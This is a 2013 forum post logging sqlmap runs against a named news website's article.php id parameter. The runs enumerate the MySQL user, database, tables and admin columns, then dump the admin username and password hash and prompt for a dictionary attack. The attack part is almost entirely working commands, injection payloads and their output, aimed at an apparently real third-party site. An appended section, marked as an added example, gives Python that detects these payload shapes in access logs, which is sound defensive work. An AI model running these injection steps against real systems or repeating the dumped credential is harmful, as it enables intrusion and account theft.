sqlmap injection example against MySQL

Posted by OP on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* list the tables of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
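As an added example that is not part of the original post: the four payload shapes sqlmap reports for the `id` parameter above (boolean-based, error-based, UNION, time-based) turned into detection logic for a web server's access log. The log lines, client IP and regexes are constructed for illustration and are not from the target site; the same checks apply to any query parameter, not only `id`.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed Apache combined-log lines (not real traffic): one benign request and
# the four sqlmap payload shapes from the session, URL-encoded as they travel on the wire.
SAMPLE_LOG = r"""
203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20%28SELECT%208404%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C99%2C118%2C120%2C58%29%2C%28SELECT%20%28CASE%20WHEN%20%288404%3D8404%29%20THEN%201%20ELSE%200%20END%29%29%2CCHAR%2858%2C110%2C99%2C118%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 812
203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%28CHAR%2858%2C99%2C118%2C120%2C58%29%2CCHAR%2832%29%2CCHAR%2858%2C110%2C99%2C118%2C58%29%29%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1" 200 4410
203.0.113.5 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120
"""

# One signature per technique named in sqlmap's "Type:" lines (assumed patterns, not sqlmap's own).
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decoded_params(target):
    """Query parameters of a request target with URL-encoding removed (twice, for double-encoded input)."""
    query = urlsplit(target).query
    return {k: unquote_plus(v) for k, v in parse_qsl(query, keep_blank_values=True)}


def classify(value):
    """Names of the techniques whose signature matches one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_log(text):
    """Return (ip, parameter, techniques) for every request whose parameters match a signature."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        for param, value in decoded_params(m.group("target")).items():
            techniques = classify(value)
            if techniques:
                hits.append((m.group("ip"), param, techniques))
    return hits


if __name__ == "__main__":
    for ip, param, techniques in scan_log(SAMPLE_LOG):
        print(f"{ip} param={param} -> {', '.join(techniques)}")
```

The benign `id=276` request produces no hit, while the other four lines each match exactly one technique; in production the same per-client counts over a short window are what separate a scanner from a stray malformed request.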